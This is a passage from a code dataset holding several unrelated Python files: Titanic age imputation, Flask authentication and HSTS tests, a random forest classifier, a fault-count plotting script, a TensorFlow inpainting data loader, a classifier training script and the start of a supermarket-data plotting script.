Dr.\n    known_age_Dr = known_age[known_age['Name'].str.contains('Dr\\\\.')]\n\n    unknown_age_Dr = unknown_age[unknown_age['Name'].str.contains('Dr\\\\.')]\n\n    unknown_age_Dr['Age'].fillna(known_age_Dr['Age'].mean(), inplace = True)\n\n    age_df.iloc[unknown_age_Dr.index.tolist(), :] = unknown_age_Dr\n\n    ### mean age for Master.\n    known_age_Master = known_age[known_age['Name'].str.contains('Master\\\\.')]\n\n    unknown_age_Master = unknown_age[unknown_age['Name'].str.contains('Master\\\\.')]\n\n    unknown_age_Master['Age'].fillna(known_age_Master['Age'].mean(), inplace = True)\n\n    age_df.iloc[unknown_age_Master.index.tolist(), :] = unknown_age_Master\n    ### the test set contains Ms. rows with missing ages\n    unknown_age_Ms = unknown_age[unknown_age['Name'].str.contains('Ms\\\\.')]\n\n    unknown_age_Ms['Age'].fillna(40, inplace = True)\n\n    age_df.iloc[unknown_age_Ms.index.tolist(), :] = unknown_age_Ms\n\n    print('df before: \\n', df)\n\n    print('age_df : \\n', age_df)\n\n    # df.iloc[age_df.index.tolist(), ['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] = age_df\n\n    df.loc[age_df.index.tolist(), ['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] = age_df\n\n    print('df after: \\n', df)\n\n    # os.system(\"pause\")\n\n    return df\n\ndef set_missing_ages_rf(df):\n    ##############################################\n    ########### fit the missing ages with a random forest ###########\n    age_df = df[['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] # extract these columns from the dataframe\n\n    known_age = age_df[age_df.Age.notnull()]\n\n    unknown_age = age_df[age_df.Age.isnull()]\n\n    # column 0 is Name; Age (column 1) is the regression target and the remaining columns are features\n    y = known_age.values[:, 1]\n\n    # print('y : ', y)\n\n    X = known_age.values[:, 2:]\n\n    # print('X : ', X)\n\n    rfr = RandomForestRegressor(random_state = 0, n_estimators = 2000, n_jobs = -1)\n\n    rfr.fit(X, y) # random forest regression\n\n    print('unknown_age.values : \\n', unknown_age.values)\n\n    predictedAges = rfr.predict(unknown_age.values[:, 2:])\n\n    print('predictedAges : \\n', predictedAges)\n\n    df.loc[(df.Age.isnull()), 'Age'] = predictedAges\n\n    return df\n    ##############################################\n\n
def set_Cabin_type(df):\n    df.loc[(df.Cabin.notnull()), 'Cabin'] = \"Yes\"\n    df.loc[(df.Cabin.isnull()), 'Cabin'] = \"No\"\n    return df\n","sub_path":"data_missing.py","file_name":"data_missing.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"27407598","text":"import os\nfrom datetime import datetime\nfrom unittest.mock import Mock\nfrom urllib.parse import quote, urlparse\n\nimport pendulum\nimport pytest\nfrom flask import session, url_for\n\nfrom atat.domain.auth import UNPROTECTED_ROUTES\nfrom atat.domain.exceptions import NotFoundError\nfrom atat.domain.users import Users\nfrom tests.factories import UserFactory\nfrom tests.utils import FakeLogger\n\nPROTECTED_URL = \"/home\"\n\n\ndef test_home_page_with_complete_profile(client, user_session):\n user = UserFactory.create()\n user_session(user)\n response = client.get(PROTECTED_URL, follow_redirects=False)\n assert response.status_code == 200\n\n\ndef test_redirect_when_profile_missing_fields(client, user_session):\n user = UserFactory.create(email=None)\n user_session(user)\n response = client.get(PROTECTED_URL, follow_redirects=False)\n assert response.status_code == 302\n assert \"/user?next={}\".format(quote(PROTECTED_URL, safe=\"\")) in response.location\n\n\ndef test_unprotected_route_with_incomplete_profile(client, user_session):\n user = UserFactory.create()\n user_session(user)\n response = client.get(\"/about\", follow_redirects=False)\n assert response.status_code == 200\n\n\ndef test_completing_user_profile(client, user_session):\n user = UserFactory.create(phone_number=None)\n user_session(user)\n response = client.get(PROTECTED_URL, follow_redirects=True)\n assert b\"You must complete your profile\" in response.data\n\n updated_data = {**user.to_dictionary(), \"phone_number\": \"5558675309\"}\n response = client.post(url_for(\"users.update_user\"), data=updated_data)\n assert response.status_code == 200\n\n response = client.get(PROTECTED_URL, follow_redirects=False)\n assert response.status_code == 200\n assert b\"You must complete your profile\" not in response.data\n\n\n@pytest.fixture\ndef mock_login(monkeypatch):\n def _mock_login(user, client, **kwargs):\n monkeypatch.setattr(\n \"atat.routes.load_attributes_from_assertion\", lambda *a: None\n )\n monkeypatch.setattr(\n \"atat.routes.get_user_from_saml_attributes\", lambda *a: user\n )\n return client.post(url_for(\"atat.login\", acs=\"\"))\n\n return _mock_login\n\n\n# checks that all of the routes in the app are protected by auth\ndef is_unprotected(rule):\n return rule.endpoint in UNPROTECTED_ROUTES\n\n\ndef protected_routes(app):\n for rule in app.url_map.iter_rules():\n args = [1] * len(rule.arguments)\n mock_args = dict(zip(rule.arguments, args))\n _n, route = rule.build(mock_args)\n if is_unprotected(rule) or \"/static\" in route:\n continue\n yield rule, route\n\n\ndef test_protected_routes_redirect_to_login(client, app):\n server_name = app.config.get(\"SERVER_NAME\") or \"localhost\"\n for rule, protected_route in protected_routes(app):\n if \"GET\" in rule.methods:\n resp = client.get(protected_route)\n assert resp.status_code == 302\n assert server_name in resp.headers[\"Location\"]\n\n if \"POST\" in rule.methods:\n resp = client.post(protected_route)\n assert resp.status_code == 302\n assert server_name in resp.headers[\"Location\"]\n\n\ndef test_unprotected_routes_set_user_if_logged_in(client, app, user_session):\n user = UserFactory.create()\n\n resp = client.get(url_for(\"atat.about\"))\n assert resp.status_code == 200\n assert user.full_name not in resp.data.decode()\n\n user_session(user)\n resp = client.get(url_for(\"atat.about\"))\n assert resp.status_code == 200\n assert user.full_name in resp.data.decode()\n\n\ndef test_logout(app, client, mock_login, mock_logger):\n 
user = UserFactory.create()\n # create a real session\n mock_login(user, client)\n resp_success = client.get(url_for(\"users.user\"))\n # verify session is valid\n assert resp_success.status_code == 200\n client.get(url_for(\"atat.logout\"))\n resp_failure = client.get(url_for(\"users.user\"))\n # verify that logging out has cleared the session\n assert resp_failure.status_code == 302\n destination = urlparse(resp_failure.headers[\"Location\"]).path\n assert destination == url_for(\"atat.root\")\n # verify that logout is noted in the logs\n logout_msg = mock_logger.messages[-1]\n assert user.dod_id in logout_msg\n assert \"logged out\" in logout_msg\n\n\ndef test_logging_out_creates_a_flash_message(app, client, mock_login):\n user = UserFactory.create()\n mock_login(user, client)\n logout_response = client.get(url_for(\"atat.logout\"), follow_redirects=True)\n\n assert \"Logged out\" in logout_response.data.decode()\n\n\ndef test_redirected_on_login(client, monkeypatch, mock_login):\n target_route = url_for(\"users.user\")\n user = UserFactory.create()\n # create a mock for the SAML provider\n saml_auth_mock = Mock()\n # mock our the last request ID, which must be serialized to the session\n saml_auth_mock.get_last_request_id.return_value = 5\n monkeypatch.setattr(\n \"atat.routes.saml_helpers.init_saml_auth\", lambda *a: saml_auth_mock\n )\n # GET the login route, which will populate the \"next\" param in the user's session\n response = client.get(url_for(\"atat.login\", next=target_route))\n # login with the POST portion of the fed auth flow; user should be\n # redirected to the location of the original \"next\" param\n response = mock_login(user, client)\n assert response.status_code == 302\n assert target_route in response.headers.get(\"Location\")\n\n\ndef test_last_login_set_when_user_logs_in(client, mock_login):\n last_login = pendulum.now(tz=\"UTC\")\n user = UserFactory.create(last_login=last_login)\n mock_login(user, client)\n assert session[\"last_login\"]\n assert user.last_login > session[\"last_login\"]\n assert isinstance(session[\"last_login\"], datetime)\n\n\n@pytest.mark.parametrize(\n \"url,status_code\", [(\"/\", 200), (\"/this-page-will-never-exist\", 302)]\n)\ndef test_hsts_unprotected(client, url, status_code):\n response = client.get(url, follow_redirects=False)\n assert response.status_code == status_code\n assert (\n response.headers.get(\"Strict-Transport-Security\")\n == \"max-age=31536000; includeSubDomains; always\"\n )\n\n\n@pytest.mark.parametrize(\n \"url,status_code\", [(PROTECTED_URL, 200), (\"/this-page-will-never-exist\", 404)]\n)\ndef test_hsts_protected(client, mock_login, url, status_code):\n user = UserFactory.create()\n mock_login(user, client)\n response = client.get(url, follow_redirects=False)\n assert response.status_code == status_code\n assert (\n response.headers.get(\"Strict-Transport-Security\")\n == \"max-age=31536000; includeSubDomains; always\"\n )\n","sub_path":"tests/routes/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":6678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"302350887","text":"\nimport tree as tree\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nfrom sklearn.model_selection import train_test_split\n\n\nclass RandomForest:\n ''' Implements the Random Forest For Classification... '''\n\n def __init__(self, ntrees=10, treedepth=5, usebagging=False, baggingfraction=0.6,\n weaklearner=\"Conic\",\n nsplits=10,\n nfeattest=None, posteriorprob=False, scalefeat=True):\n \"\"\"\n Build a random forest classification forest....\n\n Input:\n ---------------\n ntrees: number of trees in random forest\n treedepth: depth of each tree\n usebagging: to use bagging for training multiple trees\n baggingfraction: what fraction of training set to use for building each tree,\n weaklearner: which weaklearner to use at each interal node, e.g. \"Conic, Linear, Axis-Aligned, Axis-Aligned-Random\",\n nsplits: number of splits to test during each feature selection round for finding best IG,\n nfeattest: number of features to test for random Axis-Aligned weaklearner\n posteriorprob: return the posteriorprob class prob\n scalefeat: wheter to scale features or not...\n \"\"\"\n\n self.ntrees = ntrees\n self.treedepth = treedepth\n self.usebagging = usebagging\n self.baggingfraction = baggingfraction\n\n self.weaklearner = weaklearner\n self.nsplits = nsplits\n self.nfeattest = nfeattest\n\n self.posteriorprob = posteriorprob\n\n self.scalefeat = scalefeat\n\n pass\n\n def findScalingParameters(self, X):\n \"\"\"\n find the scaling parameters\n input:\n -----------------\n X= m x d training data matrix...\n \"\"\"\n self.mean = np.mean(X, axis=0)\n self.std = np.std(X, axis=0)\n\n def applyScaling(self, X):\n \"\"\"\n Apply the scaling on the given training parameters\n Input:\n -----------------\n X: m x d training data matrix...\n Returns:\n -----------------\n X: scaled version of X\n \"\"\"\n X = X - self.mean\n X = X / self.std\n return X\n\n def train(self, X, Y, vX=None, vY=None):\n '''\n Trains a RandomForest using the provided training set..\n\n Input:\n ---------\n X: a m x d matrix of training data...\n Y: labels (m x 1) label matrix\n\n vX: a n x d matrix of validation data (will be used to stop growing the RF)...\n vY: labels (n x 1) label matrix\n\n Returns:\n -----------\n\n '''\n\n nexamples, nfeatures = X.shape\n\n self.findScalingParameters(X)\n if self.scalefeat:\n X = self.applyScaling(X)\n\n self.trees = []\n\n\n if vX is not None and vY is not None:\n self.ntrees = self.find_best_parameters(X, Y, vX, vY)\n\n print(\"\\nBuilding Classifier\\n\")\n for ntree in range(self.ntrees):\n print (\"Creating tree # {}\".format(ntree+1))\n self.trees.append(self.train_tree(X, Y))\n print('')\n\n def train_tree(self, X, Y, verbose = True ):\n '''\n Trains A tree based on given arguments\n\n return : the Decision Tree object\n '''\n\n dt = tree.DecisionTree(exthreshold=10, maxdepth=self.treedepth,\n weaklearner=self.weaklearner, nsplits=self.nsplits)\n dt.verbose = verbose\n\n if self.usebagging:\n X_train, _, Y_train, _ = train_test_split(X, Y, train_size=self.baggingfraction)\n dt.train(X_train, Y_train)\n return dt\n \n dt.train(X, Y)\n return dt\n \n def find_best_parameters(self, X, Y, vX, vY):\n '''\n\n Trains RandomForest using the provided training set with trees ranging from\n 10 to 30 return the best ntrees with best accuracy.\n\n Input:\n ---------\n X: a m x d matrix of training data...\n Y: labels (m x 1) label matrix\n\n vX: a n x d matrix of validation data (will be used to stop growing the RF)...\n vY: labels (n x 
1) label matrix\n\n        Returns:\n        -----------\n        The optimal number of trees\n\n        '''\n\n        accuracy_list = []\n        optimal_parameters = []\n\n        for ntrees in range(10,31,2):\n\n            print (\"Creating Classifier with {} trees.\".format(ntrees))\n            # Training Classifier\n            for ntree in range(ntrees):\n                self.trees.append(self.train_tree(X, Y, verbose = False))\n\n            Yp = self.predict(vX)\n            optimal_parameters.append( ntrees )\n            acc = self.find_accuracy(vY,Yp)\n            print (\"Accuracy of Classifier with {} trees is {}.\".format(ntrees, acc*100))\n            accuracy_list.append(acc)\n            self.trees.clear()\n\n        maxAcc = np.argmax(accuracy_list)\n        param = optimal_parameters[maxAcc]\n        print(\"Validation complete. Optimal parameters: Trees = {} with Accuracy {}\".format(param, accuracy_list[maxAcc]))\n        return param\n\n    def find_accuracy(self, Y, Yp):\n        plabels = pd.Series(np.squeeze(Yp))\n        tlabels = pd.Series(np.squeeze(Y))\n\n        acc = np.sum(tlabels == plabels) / len(Y)\n        return acc\n\n    def predict(self, X):\n        \"\"\"\n        Test the trained RF on the given set of examples X\n\n        Input:\n        ------\n        X: [m x d] matrix of d-dimensional test examples.\n\n        Returns:\n        -----------\n        pclass: the predicted class for each given example\n        \"\"\"\n        z = []\n\n        if self.scalefeat:\n            X = self.applyScaling(X)\n\n        pred = []\n\n        for tree in self.trees:\n            z.append(tree.predict(X))\n        z = np.array(z).T\n\n        for row in z:\n            pred.append(stats.mode(row)[0])\n        return pred\n","sub_path":"randomForest.py","file_name":"randomForest.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"642357755","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\n\n\nif(len(sys.argv) == 3):\n csv_name = sys.argv[1]\n graph_name = sys.argv[2]\n\n df = pd.read_csv(csv_name)\n df1 = df.iloc[:,3:]\n values = []\n for i in range(0,len(df1.columns)):\n values.append(df1.iloc[:,i].sum())\n faults = ['t_1bit','t_1word','t_1col','t_1row','t_1bank','t_nbank','t_nrank','p_1bit','p_1word','p_1col','p_1row','p_1bank','p_nbank','p_nrank']\n y_pos = np.arange(len(faults))\n plt.bar(y_pos,values,align='center')\n plt.xticks(y_pos,faults,rotation='vertical')\n plt.ylabel('Fault number')\n plt.xlabel('Fault Type')\n plt.title(graph_name)\n plt.tight_layout()\n plt.savefig(graph_name + \".png\")\n\nelse:\n print(\"Wrong number of arguments\")\n","sub_path":"scripts/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534644559","text":"import os\nimport glob\nimport platform as pf\nimport yaml\n# import random\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nfrom scipy import ndimage\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray\nfrom utils import create_mask\nfrom utils import tf_canny\nfrom utils import tf_get_color_domain\n\n\nclass Dataset():\n \"\"\"Construct dataset class.\"\"\"\n\n def __init__(self, config, flist):\n # if pf.system() == 'Windows':\n # train_flist = config['TRAIN_FLIST_WIN']\n # val_flist = config['VAL_FLIST_WIN']\n # test_flist = config['TEST_FLIST_WIN']\n # elif pf.system() == 'Linux':\n # if pf.node() == 'icie-Precision-Tower-7810':\n # train_flist = config['TRAIN_FLIST_LINUX_7810']\n # val_flist = config['VAL_FLIST_LINUX_7810']\n # test_flist = config['TEST_FLIST_LINUX_7810']\n # elif pf.node() == 'icie-Precision-T7610':\n # train_flist = config['TRAIN_FLIST_LINUX_7610']\n # val_flist = config['VAL_FLIST_LINUX_7610']\n # test_flist = config['TEST_FLIST_LINUX_7610']\n\n self.cfg = config\n # self.training = training\n self.flist = self.load_flist(flist)\n self.filenames = tf.placeholder(tf.string, shape=[None])\n self.iterator = None\n\n def __len__(self):\n \"\"\"Get the length of dataset.\"\"\"\n return len(self.flist)\n\n def load_items(self):\n images = self.load_images()\n img_color_domains = self.load_color_domain(images)\n return images, img_color_domains\n\n def input_parse(self, img_path):\n with tf.device('/cpu:0'):\n img_file = tf.read_file(img_path)\n img_decoded = tf.image.decode_png(img_file, channels=3)\n img = tf.cast(img_decoded, tf.float32) # [1024, 1024, 3]\n # img = tf.image.resize_area(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE']])\n # img = tf.clip_by_value(img, 0., 255.)\n # img = tf.image.resize_image_with_crop_or_pad(img, self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'])\n # img = img / 127.5 - 1\n return img # [-1, 1]\n\n def load_images(self):\n dataset = tf.data.Dataset.from_tensor_slices(self.filenames)\n dataset = dataset.map(self.input_parse)\n dataset = dataset.shuffle(buffer_size=100)\n dataset = dataset.batch(self.cfg['BATCH_SIZE'], drop_remainder=True)\n dataset = dataset.repeat()\n # train_dataset = train_dataset.batch(self.cfg['BATCH_SIZE'], drop_remainder=True)\n self.iterator = dataset.make_initializable_iterator()\n images = self.iterator.get_next()\n images = tf.image.resize_area(images, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE']])\n images = tf.clip_by_value(images, 0., 255.)\n images = images / 127.5 - 1 # [-1, 1]\n\n return images # [N, 256, 256, 3]\n\n def load_color_domain(self, images):\n images = (images + 1) * 127.5 # [0, 255]\n images = tf.cast(images, tf.uint8)\n # shape = images.get_shape().as_list()\n shape = tf.shape(images)\n\n blur_factor1 = self.cfg['BLUR_FACTOR1']\n blur_factor2 = self.cfg['BLUR_FACTOR2']\n k = self.cfg['K']\n\n img_color_domains = tf.map_fn(fn=lambda im: tf_get_color_domain(im, blur_factor1, blur_factor2, k),\n elems=images,\n dtype=tf.float32)\n\n img_color_domains = tf.reshape(img_color_domains, shape)\n return img_color_domains # [N, 256, 256, 3]\n\n def load_flist(self, flist):\n if isinstance(flist, list):\n return flist\n\n # flist: image file path, image directory path, text file flist path\n if isinstance(flist, str):\n if os.path.isdir(flist):\n flist = list(glob.glob(flist + '/*.jpg')) + list(glob.glob(flist + '/*.png')) + \\\n list(glob.glob(flist + '/*.JPG'))\n flist.sort()\n return 
flist\n\n if os.path.isfile(flist):\n # return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n try:\n print('is a file')\n return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n except:\n return [flist]\n\n return []\n\n\nclass MaskDataset():\n \"\"\"Construct mask dataset class.\"\"\"\n\n def __init__(self, config, mask_flist):\n # if pf.system() == 'Windows':\n # mask_flist = config['MASK_FLIST_WIN']\n # elif pf.system() == 'Linux':\n # if pf.node() == 'icie-Precision-Tower-7810':\n # mask_flist = config['MASK_FLIST_LINUX_7810']\n # elif pf.node() == 'icie-Precision-T7610':\n # mask_flist = config['MASK_FLIST_LINUX_7610']\n\n self.cfg = config\n self.mask_iterator = None\n self.mask_type = config['MASK']\n self.mask_flist = mask_flist\n\n def load_items(self):\n masks = self.load_masks()\n return masks\n\n def load_masks(self):\n\n # random block + half\n if self.mask_type == 1:\n masks = create_mask(self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'],\n self.cfg['INPUT_SIZE'] // 2, self.cfg['INPUT_SIZE'] // 2)\n\n return masks # [1, 256, 256, 1]\n\n # external mask\n if self.mask_type == 2:\n mask_path = tf.constant(self.load_flist(self.mask_flist))\n mask_dataset = tf.data.Dataset.from_tensor_slices(mask_path)\n mask_dataset = mask_dataset.map(self.external_mask_parse)\n mask_dataset = mask_dataset.shuffle(buffer_size=50)\n mask_dataset = mask_dataset.batch(self.cfg['BATCH_SIZE'], drop_remainder=True)\n mask_dataset = mask_dataset.repeat()\n self.mask_iterator = mask_dataset.make_initializable_iterator()\n masks = self.mask_iterator.get_next()\n\n return masks # [N, 256, 256, 1]\n\n def external_mask_parse(self, img_path):\n with tf.device('/cpu:0'):\n img_file = tf.read_file(img_path)\n img_decoded = tf.image.decode_png(img_file) # [512, 512]\n img = tf.reshape(img_decoded, [1, 512, 512, 1])\n img = tf.image.resize_area(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE']])\n img = tf.reshape(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'], 1])\n img = tf.cast(tf.greater(img, 3), dtype=tf.float32)\n img = tf.image.rot90(img, tf.random_uniform([], 0, 4, tf.int32))\n img = tf.image.random_flip_left_right(img)\n # img = tf.reshape(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'], 1])\n\n # 1 for the missing regions, 0 for background\n img = 1 - img\n\n return img # [256, 256, 1]\n\n def load_flist(self, flist):\n if isinstance(flist, list):\n return flist\n\n # flist: image file path, image directory path, text file flist path\n if isinstance(flist, str):\n if os.path.isdir(flist):\n flist = list(glob.glob(flist + '/*.jpg')) + list(glob.glob(flist + '/*.png')) + \\\n list(glob.glob(flist + '/*.JPG'))\n flist.sort()\n return flist\n\n if os.path.isfile(flist):\n # return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n try:\n print('is a file')\n return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n except:\n return [flist]\n\n return []\n\n\nif __name__ == '__main__':\n with open('config.yaml', 'r') as f:\n cfg = yaml.load(f)\n\n if pf.system() == 'Windows':\n train_flist = cfg['TRAIN_FLIST_WIN']\n val_flist = cfg['VAL_FLIST_WIN']\n test_flist = cfg['TEST_FLIST_WIN']\n mask_flist = cfg['MASK_FLIST_WIN']\n elif pf.system() == 'Linux':\n if pf.node() == 'icie-Precision-Tower-7810':\n train_flist = cfg['TRAIN_FLIST_LINUX_7810']\n val_flist = cfg['VAL_FLIST_LINUX_7810']\n test_flist = cfg['TEST_FLIST_LINUX_7810']\n mask_flist = cfg['MASK_FLIST_LINUX_7810']\n elif pf.node() == 'icie-Precision-T7610':\n train_flist = cfg['TRAIN_FLIST_LINUX_7610']\n val_flist = 
cfg['VAL_FLIST_LINUX_7610']\n test_flist = cfg['TEST_FLIST_LINUX_7610']\n mask_flist = cfg['MASK_FLIST_LINUX_7610']\n\n dataset = Dataset(cfg, val_flist)\n images, img_color_domains = dataset.load_items()\n iterator = dataset.iterator\n\n mask_dataset = MaskDataset(cfg, mask_flist)\n img_masks = mask_dataset.load_items()\n mask_iterator = mask_dataset.mask_iterator\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n iterators = [iterator.initializer, mask_iterator.initializer] if cfg['MASK'] == 2 else iterator.initializer\n\n feed_dict = {dataset.filenames: dataset.flist}\n\n sess.run(iterators, feed_dict=feed_dict)\n\n tmp0, tmp1, tmp2 = sess.run([images, img_masks, img_color_domains])\n\n tmp0 = (tmp0 + 1) / 2.\n print(tmp0[0].shape)\n # print(tmp2[1, :, :, 0])\n\n plt.figure(figsize=(8, 3))\n\n plt.subplot(131)\n plt.imshow(tmp0[0])\n plt.axis('off')\n plt.title('rgb', fontsize=20)\n\n # plt.subplot(152)\n # plt.imshow(tmp1[0, :, :, 0], cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('gray', fontsize=20)\n\n # plt.subplot(153)\n # plt.imshow(tmp2[0, :, :, 0], cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('edge', fontsize=20)\n\n plt.subplot(132)\n plt.imshow(tmp1[0, :, :, 0], cmap=plt.cm.gray)\n plt.axis('off')\n plt.title('mask', fontsize=20)\n\n plt.subplot(133)\n plt.imshow(tmp2[0])\n plt.axis('off')\n plt.title('color_domain', fontsize=20)\n\n plt.show()\n\n # flist = dataset.load_flist(cfg['FLIST_WIN'])\n # img = imread(flist[0])\n # img_gray = rgb2gray(img)\n # print(img[:, :, 0])\n # print(img_gray)\n # img_edge = canny(img_gray, sigma=2)\n\n # plt.figure(figsize=(8, 3))\n\n # plt.subplot(131)\n # plt.imshow(img)\n # plt.axis('off')\n # plt.title('rgb', fontsize=20)\n\n # plt.subplot(132)\n # plt.imshow(img_gray, cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('gray', fontsize=20)\n\n # plt.subplot(133)\n # plt.imshow(img_edge, cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('edge', fontsize=20)\n\n # plt.subplots_adjust(wspace=0.02, hspace=0.02, top=0.9, bottom=0.02, left=0.02, right=0.98)\n\n # plt.show()\n","sub_path":"Inpainting/PIC-EC/color_domain/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"191596180","text":"import json\nimport cPickle as pickle\nimport numpy as np\n\nfrom bubbly.model import Model, ModelGroup\nfrom bubbly.extractors import MultiViewExtractor, ManyManyExtractors\nfrom bubbly.dr1 import WideLocationGenerator,LocationGenerator\nfrom bubbly.wiserf import WiseRF\n#from sklearn.ensemble import RandomForestClassifier\n\ndef add_traningset_1(data,lon):\n for ctt_l in range(10):\n for ctt_b in range(4):\n data['pos'].append([lon, lon%360-0.95+ctt_l*0.1, (ctt_b-1)*0.1, 0.046])\n return data\n \ndef add_traningset_2(data,lon):\n for ctt_l in range(10):\n for ctt_b in range(4):\n data['pos'].append([lon, lon%360-0.95+ctt_l*0.1, (ctt_b-1)*0.1, 0.038])\n return data\n \ndef add_traningset_neg(data,lon):\n for ctt_l in range(20):\n for ctt_b in range(8):\n data['neg'].append([lon, lon%360-0.95+ctt_l*0.1, (ctt_b-3.5)*0.1, 0.046]) \n return data\n \n \ndef make_model(mod3):\n params = {'max_features': 'auto',\n 'n_jobs': 2,\n 'min_samples_split': 4,\n# 'criterion': 'infogain',\n 'criterion': 'gini', ### entropy\n# 'criterion': 'entropy', ### \n 'n_estimators': 800}\n ex = MultiViewExtractor(ManyManyExtractors())\n loc = WideLocationGenerator(mod3)\n# clf = RandomForestClassifier(**params)\n clf = WiseRF(**params)\n return Model(ex, loc, clf)\n\n\ndef train_model(model, mod3):\n# data = json.load(open('../models/training_data_%i.json' % mod3))\n data = json.load(open('../models/training_dataxdno_%i.json' % mod3))\n# data = json.load(open('../models/training_dataxd_%i.json' % mod3))\n\n\n# if mod3==0:\n# for lon_all in np.array([71,82,74,76])+360:\n# data=add_traningset_1(data,np.int(lon_all))\n# for lon_all in np.array([73,85,77])+360:\n# data=add_traningset_2(data,np.int(lon_all))\n# data=add_traningset_neg(data,82)\n# if mod3==1:\n# for lon_all in np.array([71,72,74,86])+360:\n# data=add_traningset_1(data,np.int(lon_all))\n# for lon_all in np.array([83,75,77])+360:\n# data=add_traningset_2(data,np.int(lon_all)) \n# data=add_traningset_neg(data,83)\n# if mod3==2:\n# for lon_all in np.array([81,72,84,76])+360:\n# data=add_traningset_1(data,np.int(lon_all))\n# for lon_all in np.array([73,75,87])+360:\n# data=add_traningset_2(data,np.int(lon_all)) \n# data=add_traningset_neg(data,82)\n \n if mod3==0:\n for lon_all in np.array([71,82,74,76,121,112,124,116])+360:\n# for lon_all in np.array([121,112,124,116])+360:\n data=add_traningset_1(data,np.int(lon_all))\n for lon_all in np.array([73,85,77,113,115,127])+360:\n# for lon_all in np.array([113,115,127])+360:\n data=add_traningset_2(data,np.int(lon_all))\n data=add_traningset_neg(data,82)\n if mod3==1:\n for lon_all in np.array([71,72,74,86,111,122,114,116])+360:\n# for lon_all in np.array([111,122,114,116])+360:\n data=add_traningset_1(data,np.int(lon_all))\n for lon_all in np.array([83,75,77,113,125,117])+360:\n# for lon_all in np.array([113,125,117])+360:\n data=add_traningset_2(data,np.int(lon_all)) \n data=add_traningset_neg(data,83)\n if mod3==2:\n for lon_all in np.array([81,72,84,76,111,112,114,126])+360:\n# for lon_all in np.array([111,112,114,126])+360:\n data=add_traningset_1(data,np.int(lon_all))\n for lon_all in np.array([73,75,87,123,115,117])+360:\n# for lon_all in np.array([123,115,117])+360:\n data=add_traningset_2(data,np.int(lon_all)) \n data=add_traningset_neg(data,82)\n \n \n model.fit(data['pos'], data['neg'])\n return model\n\n#\"\"\"\ndef main():\n\n models = [train_model(make_model(i), i) for i in [0, 1, 2]]\n# models = [train_model(make_model(i), i) for i in [0]]\n mg = ModelGroup(*models)\n# 
mg.save('../models/full_classifier_retrain_xd_all_0417_noise.dat')\n# mg.save('../models/full_classifier_retrain_xd_all_entropy_0430.dat')\n# mg.save('../models/full_classifier_retrain_xd_all_gini_0528.dat')\n# mg.save('../models/full_classifier_xd_entropy_0528.dat')\n# mg.save('../models/full_classifier_xd_reduceMWP_simulation_1025.dat')\n# mg.save('../models/full_classifier_xd_only_simulation_1029.dat')\n# mg.save('../models/full_classifier_xd_retrain_noise_1030.dat')\n mg.save('../models/full_classifier_xd_only_sim_non_noi_1102.dat')\n# mg.save('../models/full_classifier_retrain_xd_all_gini_0528.dat')\n# mg.save('../models/full_classifier_xd_all_entropy_0430.dat')\n# mg.save('../models/full_classifier_xd_all_0417.dat')\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/build_full_classifier.py","file_name":"build_full_classifier.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"125906699","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nProject Markov -\n@author: boti\n\"\"\"\n\n# Import pandas etc\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\ndef plotsections(df, dayofweek):\n    totalcustomers = df['customer_no'].nunique()\n    print(f'Total number of customers on {dayofweek}: {totalcustomers}')\n    print(f'Total number of customers at each location on {dayofweek}:')\n    print(df.groupby('location')['customer_no'].nunique())\n    df[df['location']=='spices'].resample('1h')['customer_no'].nunique().plot()\n    df[df['location']=='fruit'].resample('1h')['customer_no'].nunique().plot()\n    df[df['location']=='drinks'].resample('1h')['customer_no'].nunique().plot()\n    df[df['location']=='dairy'].resample('1h')['customer_no'].nunique().plot()\n    filename = 'plots/sections-' + dayofweek + '.jpg'\n    plt.savefig(filename)\n    plt.cla()\n\n    df[df['location']=='checkout'].resample('1h')['customer_no'].nunique().plot()\n    filename = 'plots/checkout-' + dayofweek + '.jpg'\n    plt.savefig(filename)\n    plt.cla()\n\n    finalcheckoutcustomers = totalcustomers - 